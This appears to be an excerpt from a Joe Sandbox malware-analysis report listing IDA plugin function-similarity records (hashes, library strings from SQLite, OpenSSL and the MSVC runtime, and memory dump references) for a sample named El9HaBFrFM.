                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 9aa9ffdd5bc88ab497d3b89d8a464cfdb7345b19c087d9fb5c3e39bcf37f5cbd
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F110920F0CE0786F968AA6D695117E11434F85770F9857B8DF3ECA6D2DD2DB8419311
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f311c9e24136a87dee3d19148c0fc7a5b38b122ddf6625ef5a4b908f65c372a8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15919A32A09E4681FB658E29D45037E76A6AB40B94F844276DF5EC73E7DF3CE8858301
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • 00007FFE13343010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB107847), ref: 00007FFDFB10D52A
                                                                                                                                                                                                                                                                                                                        • 00007FFE13343010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB107847), ref: 00007FFDFB10D554
                                                                                                                                                                                                                                                                                                                        • 00007FFE13343010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB107847), ref: 00007FFDFB10D5A7
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-2852464175
                                                                                                                                                                                                                                                                                                                        • Opcode ID: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 032fd7f1e87021bd662f67d24f787d4f3836f8ff3b9abbbdc60276d4a8de8986
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfbeda1bf99951151eff030447c4d7a4d5e89bf1fbf00df94b65fd72b816f457
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E919267F1A64A85EB248E15A460B7977A0FB45BD8F184634DEBD47BE8CF3CE4508B00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1ba2870bf5cba99e8c96209f0761cb7b2f28a72f8d294bf50bcb638b8548fbcd
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1181AF72E08A4385F7649F2D815027827A2AB11B48FD5A2B9CF09D72D9CF3EE949D301
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1505470444
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
                                                                                                                                                                                                                                                                                                                        • Instruction ID: b51d1236c0b3131aadfc5e63cfd8ee352d7296890a6bafd208a6c61a2285a504
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F291AA22B0AB8289EB20DB15D464BA967A4FB46BE8F444336DA7D473E9DF38D101C300
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-3727861699
                                                                                                                                                                                                                                                                                                                        • Opcode ID: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f5bacd77d610eee3107464b056a7cb5862adfa5cb139a75e03a5bf5dc41c2899
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4581E762B0A6C28AE7548B25D1A4E7E7BA0FB427C4F084132DBAD476E9CF3CE455D740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-3459038510
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1d4661e5c2f4c2fad4983aac1168277e3abe20b263b925f6ae71bccaca4e2b92
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8b13f7088890bc0e542e3d103ada154cc2240d3399fd67006b12b180943f5f07
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d4661e5c2f4c2fad4983aac1168277e3abe20b263b925f6ae71bccaca4e2b92
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF61E563F0A5828ADB258F14A4506B9B7A2FB44BA8F484335DE6D476E9DF3DD446C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                                                                                                                                                                        • API String ID: 3568877910-2527649602
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5852a95550ca242d76d75b1297e81e40f60e737c007a576ba1c867f3f16c7ee8
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2719C21B08A8282EB589B65D864BBD3390FB84B84F884176DE7D477DEDF3CE5468310
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13341250
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
                                                                                                                                                                                                                                                                                                                        • API String ID: 2991499524-4157686371
                                                                                                                                                                                                                                                                                                                        • Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8e4ba7b326484c4783ab813d9c397357c4a90e675178bb7d29e86589870e6801
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E61E621F0C69285F7699F61D420FB96790EF45B84FC881B2DD6D47ADEDE2CE6808710
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e3afcafc8bb1c0cd91d7c4ac4f652bd2a6c99ed13ec28fbad4727f73886df184
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01517A26A196628ADF188F19E444B7C63A6EB44BD8F108175EF4EC7788EF7DE841C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-3727861699
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
                                                                                                                                                                                                                                                                                                                        • Instruction ID: be6e5b5b5297203e4e62bb3c948e94cdf5b58d2935225409484876feb831992a
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1751DF73709BC1C5CB10CB19E4A49AEBB65F755B84F55813AEAAE037A8DB3CD045C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2a3570806b04aeab73f2e69d670d3739fe0c39ef30192ff4d76e1e99d8ce88e9
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C518E32A086A28AEF748B29D04526C77A2EB54B84F1481B6EF8DC7BD5CF3DE454C701
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c9147d962ba8ae164ee0ea4d38bc82be3823770e0fbe3674d08b2fc712afde7
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF617F32908BD586EB709B19E4403AEB7A1FB85B94F144265EF9C83B99DF7CD194CB00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
